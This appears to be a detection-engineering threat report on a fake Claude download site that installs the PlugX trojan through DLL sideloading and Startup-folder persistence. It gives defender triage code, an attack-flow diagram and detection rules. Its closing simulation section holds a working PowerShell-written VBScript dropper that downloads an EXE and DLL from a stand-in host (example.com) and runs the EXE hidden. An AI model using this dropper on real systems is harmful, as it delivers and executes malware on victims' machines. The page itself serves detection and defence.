Fake Claude site installs malware that gives attackers access to your computer
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
Attackers set up a fake Claude download page that delivered a trojanized ZIP archive to unsuspecting users. Once opened, the archive installed a seemingly legitimate Claude desktop client while covertly deploying the PlugX remote access trojan through DLL sideloading with a signed G DATA updater. The malicious payload was placed in the user’s Startup folder to maintain persistence and then initiated outbound HTTPS communication with a command-and-control server. The campaign shows how threat actors are increasingly exploiting interest in popular AI tools as a social engineering lure for initial compromise.
Investigation
During analysis, researchers unpacked the ZIP archive, identified the MSI installation path, and followed execution to a VBScript dropper that wrote NOVUpdate.exe, a malicious avk.dll, and an encrypted data file into the Startup folder. Sandbox execution confirmed that the sideloaded binary launched successfully, altered a TCP/IP-related registry key, and initiated outbound connections over port 443 to an Alibaba Cloud-hosted IP address. These findings confirmed the delivery of PlugX through a staged infection chain disguised as legitimate AI software.
Mitigation
Users should download Claude software only from verified official sources and validate the authenticity of installer packages before execution. Defenders should inspect Startup folders for unexpected binaries or DLLs, especially files that mimic legitimate update components. Firewall and endpoint telemetry should also be reviewed for suspicious outbound HTTPS traffic tied to newly installed applications. Removing the malicious files, reversing any unauthorized registry changes, and running a trusted anti-malware scan are key steps to contain the threat.
Response
Security teams should detect and alert on the presence of NOVUpdate.exe, avk.dll, or NOVUpdate.exe.dat within the Startup directory. Additional detections should focus on signed G DATA updater binaries loading untrusted DLLs and establishing unexpected outbound TLS sessions to the identified infrastructure. Affected hosts should undergo full remediation and forensic review to confirm that no other PlugX components, persistence mechanisms, or follow-on payloads remain active.
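Added here as a defender-side example, not code from the original report: a PowerShell triage that walks the per-user and all-users Startup folders, flags the three artefact names listed above, and flags the sideloading pattern the report describes, a validly signed EXE sitting next to an unsigned DLL. It assumes Windows PowerShell 5.1 or later; the function and variable names are my own.

```powershell
# Added triage example (not from the original report). Assumes Windows PowerShell 5.1+;
# Get-AuthenticodeSignature and Get-FileHash ship with PowerShell. Names below are mine.
$KnownArtefacts = @('NOVUpdate.exe', 'avk.dll', 'NOVUpdate.exe.dat')
function Get-StartupFolderFindings {
    param(
        # Defaults to the per-user and all-users Startup folders
        [string[]]$Path = @(
            [Environment]::GetFolderPath('Startup'),
            [Environment]::GetFolderPath('CommonStartup')
        )
    )
    foreach ($dir in $Path) {
        if (-not (Test-Path -LiteralPath $dir)) { continue }
        Get-ChildItem -LiteralPath $dir -File -Force | ForEach-Object {
            $reasons = @()
            if ($KnownArtefacts -contains $_.Name) {
                $reasons += 'file name matches a known PlugX sideloading artefact'
            }
            if ($_.Extension -in '.exe', '.dll') {
                $sig = Get-AuthenticodeSignature -LiteralPath $_.FullName
                if ($sig.Status -ne 'Valid') {
                    $reasons += "no valid Authenticode signature ($($sig.Status))"
                }
                elseif ($_.Extension -eq '.exe') {
                    # Sideloading pattern: a validly signed EXE beside an unsigned DLL
                    foreach ($dll in (Get-ChildItem -LiteralPath $dir -Filter '*.dll' -File -Force)) {
                        $dllSig = Get-AuthenticodeSignature -LiteralPath $dll.FullName
                        if ($dllSig.Status -ne 'Valid') {
                            $reasons += "signed EXE ($($sig.SignerCertificate.Subject)) next to unsigned DLL $($dll.Name)"
                        }
                    }
                }
            }
            elseif ($_.Extension -in '.dat', '.bin') {
                $reasons += 'opaque data file in a Startup folder (possible encrypted payload)'
            }
            if ($reasons.Count -gt 0) {
                # Emit one record per suspicious file, with a hash for IOC comparison
                [pscustomobject]@{
                    Path    = $_.FullName
                    Sha256  = (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256).Hash
                    Reasons = ($reasons -join '; ')
                }
            }
        }
    }
}
Get-StartupFolderFindings | Format-Table -Wrap -AutoSize
```

Compare the SHA256 column against the HashSha256 IOCs published with this page; a validly signed updater is not on its own malicious, so the Reasons column is what to read first.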
Attack Flow
```mermaid
graph TB
    %% Class definitions
    classDef technique fill:#ffdd99
    classDef file fill:#c2f0c2
    classDef script fill:#d9d9ff
    classDef process fill:#f0c2c2
    classDef persistence fill:#ffd9b3
    classDef c2 fill:#b3e5fc
    classDef evasion fill:#e6b3ff
    classDef registry fill:#ffe699

    %% Nodes - Files and Artifacts
    node_spoofed_website["<b>File</b> – Spoofed Claude website<br/>Hosts malicious ZIP"]:::file
    node_malicious_zip["<b>File</b> – Malicious ZIP<br/>Contains trojanized MSI installer"]:::file
    node_msi_installer["<b>File</b> – Trojanized MSI installer"]:::file
    node_vbscript["<b>Script</b> – Claude AI.vbs<br/>Copies files, launches Claude, sets persistence"]:::script
    node_novupdate_exe["<b>File</b> – NOVUpdate.exe<br/>Legitimate G DATA updater used for DLL sideloading"]:::file
    node_avk_dll["<b>File</b> – avk.dll<br/>Malicious DLL loaded by updater"]:::file
    node_dat_file["<b>File</b> – NOVUpdate.exe.dat<br/>Encrypted payload"]:::file
    node_startup_folder["<b>File</b> – Startup folder<br/>Destination for copied files"]:::file
    node_shortcut["<b>File</b> – Claude AI.lnk<br/>Desktop shortcut that runs the VBScript"]:::file
    node_cleanup_batch["<b>File</b> – cleanup.bat<br/>Deletes malicious artifacts after execution"]:::file
    node_registry_key["<b>Registry</b> – HKLM\System\CurrentControlSet\Services\Tcpip\Parameters"]:::registry

    %% Nodes - Techniques
    node_initial_access["<b>Technique</b> – T1204.002 User Execution<br/>Victim downloads malicious ZIP from spoofed site and runs MSI"]:::technique
    node_execution["<b>Technique</b> – T1059.005 Visual Basic<br/>Executes malicious VBScript"]:::technique
    node_persistence_startup["<b>Technique</b> – T1037.005 Startup Items<br/>Copies files to Startup folder"]:::persistence
    node_persistence_shortcut["<b>Technique</b> – T1547.009 Shortcut Modification<br/>Creates then replaces desktop shortcut"]:::persistence
    node_appcert_dll["<b>Technique</b> – T1546.009 AppCert DLLs<br/>DLL sideloading via G DATA updater"]:::evasion
    node_obfuscation["<b>Technique</b> – T1027.009 Obfuscated Files<br/>Encrypted .dat payload decrypted at runtime"]:::evasion
    node_registry_mod["<b>Technique</b> – T1012 Query Registry<br/>Modifies TCP/IP parameters"]:::registry
    node_c2_proxy["<b>Technique</b> – T1090.002 Proxy: External Proxy<br/>HTTPS outbound via proxy"]:::c2
    node_c2_web["<b>Technique</b> – T1102 Web Service<br/>Communicates over HTTPS web service"]:::c2
    node_indicator_removal["<b>Technique</b> – T1070.010 Indicator Removal<br/>Batch file deletes dropper script and itself"]:::evasion

    %% Flow Connections
    node_spoofed_website -->|hosts| node_malicious_zip
    node_malicious_zip -->|delivered via| node_msi_installer
    node_msi_installer -->|drops| node_vbscript
    node_msi_installer -->|drops| node_novupdate_exe
    node_msi_installer -->|drops| node_avk_dll
    node_msi_installer -->|drops| node_dat_file
    node_initial_access -->|leads to| node_msi_installer
    node_vbscript -->|executes| node_execution
    node_execution -->|enables| node_persistence_startup
    node_execution -->|creates| node_shortcut
    node_persistence_startup -->|copies to| node_startup_folder
    node_startup_folder -->|contains| node_novupdate_exe
    node_startup_folder -->|contains| node_avk_dll
    node_startup_folder -->|contains| node_dat_file
    node_persistence_shortcut -->|creates| node_shortcut
    node_persistence_shortcut -->|replaces with clean| node_shortcut
    node_appcert_dll -->|loads| node_avk_dll
    node_obfuscation -->|decrypts| node_dat_file
    node_registry_mod -->|modifies| node_registry_key
    node_c2_proxy -->|uses| node_c2_web
    node_indicator_removal -->|creates| node_cleanup_batch
    node_cleanup_batch -->|deletes| node_vbscript
    node_cleanup_batch -->|deletes| node_msi_installer

    %% Class Assignments
    class node_initial_access technique
    class node_execution technique
    class node_persistence_startup persistence
    class node_persistence_shortcut persistence
    class node_appcert_dll evasion
    class node_obfuscation evasion
    class node_registry_mod registry
    class node_c2_proxy c2
    class node_c2_web c2
    class node_indicator_removal evasion
```
Detections
- LOLBAS WScript / CScript (via process_creation)
- Possible Timeout Usage for Delay Execution (via cmdline)
- Suspicious Binary / Scripts in Autostart Location (via file_event)
- IOCs (HashSha256) to detect: Fake Claude site installs malware that gives attackers access to your computer
- IOCs (SourceIP) to detect: Fake Claude site installs malware that gives attackers access to your computer
- IOCs (DestinationIP) to detect: Fake Claude site installs malware that gives attackers access to your computer
- Detect WScript Dropping and Executing NOVUpdate.exe [Windows Process Creation]
- Fake Claude Site Trojanized Installer Detection [Windows File Event]
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
Attack Narrative & Commands:
An attacker crafts a malicious VBS script that downloads the payload NOVUpdate.exe from a command-and-control (C2) server, writes it to %TEMP%, and then launches it via wscript.exe. The same script also loads avk.dll from the same location to achieve DLL sideloading. The attacker relies on the built-in Windows Script Host (WSH) to avoid raising suspicion from traditional AV heuristics.
- Write the malicious VBS file (malicious.vbs) to %TEMP%.
- Invoke wscript.exe with the path to the VBS file.
- The VBS script performs an HTTP GET to fetch NOVUpdate.exe and avk.dll, writes them to disk, and executes NOVUpdate.exe.
Regression Test Script:
```powershell
# --------------------------------------------------------------------
# Malicious dropper simulation - triggers the Sigma rule
# --------------------------------------------------------------------
$tempDir = "$env:TEMP\DropperDemo"
New-Item -ItemType Directory -Path $tempDir -Force | Out-Null

# 1. Create malicious VBS that downloads two files and runs NOVUpdate.exe
#    (expandable here-string: $tempDir is substituted into the VBS text)
$vbsPath = "$tempDir\malicious.vbs"
$vbsContent = @"
Set objXML = CreateObject("Microsoft.XMLHTTP")
objXML.open "GET", "http://example.com/NOVUpdate.exe", False
objXML.send
If objXML.Status = 200 Then
    Set objStream = CreateObject("ADODB.Stream")
    objStream.Type = 1
    objStream.Open
    objStream.Write objXML.ResponseBody
    objStream.SaveToFile "$tempDir\NOVUpdate.exe", 2
    objStream.Close
End If

' Download avk.dll (used for DLL sideloading)
objXML.open "GET", "http://example.com/avk.dll", False
objXML.send
If objXML.Status = 200 Then
    Set objStream = CreateObject("ADODB.Stream")
    objStream.Type = 1
    objStream.Open
    objStream.Write objXML.ResponseBody
    objStream.SaveToFile "$tempDir\avk.dll", 2
    objStream.Close
End If

' Execute the dropped EXE
CreateObject("WScript.Shell").Run """$tempDir\NOVUpdate.exe""", 0, False
"@
Set-Content -Path $vbsPath -Value $vbsContent -Encoding ASCII

# 2. Run the script via wscript.exe (this is the telemetry we are testing)
$wscript = "$env:SystemRoot\System32\wscript.exe"
Start-Process -FilePath $wscript -ArgumentList "`"$vbsPath`"" -WindowStyle Hidden

# OPTIONAL: pause to allow detection to fire
Start-Sleep -Seconds 10
# --------------------------------------------------------------------
```
Cleanup Commands:
```powershell
# Remove all artefacts created by the simulation
$tempDir = "$env:TEMP\DropperDemo"
if (Test-Path $tempDir) {
    Remove-Item -Path $tempDir -Recurse -Force
}

# Ensure any lingering NOVUpdate.exe processes are terminated
Get-Process -Name "NOVUpdate" -ErrorAction SilentlyContinue | Stop-Process -Force
```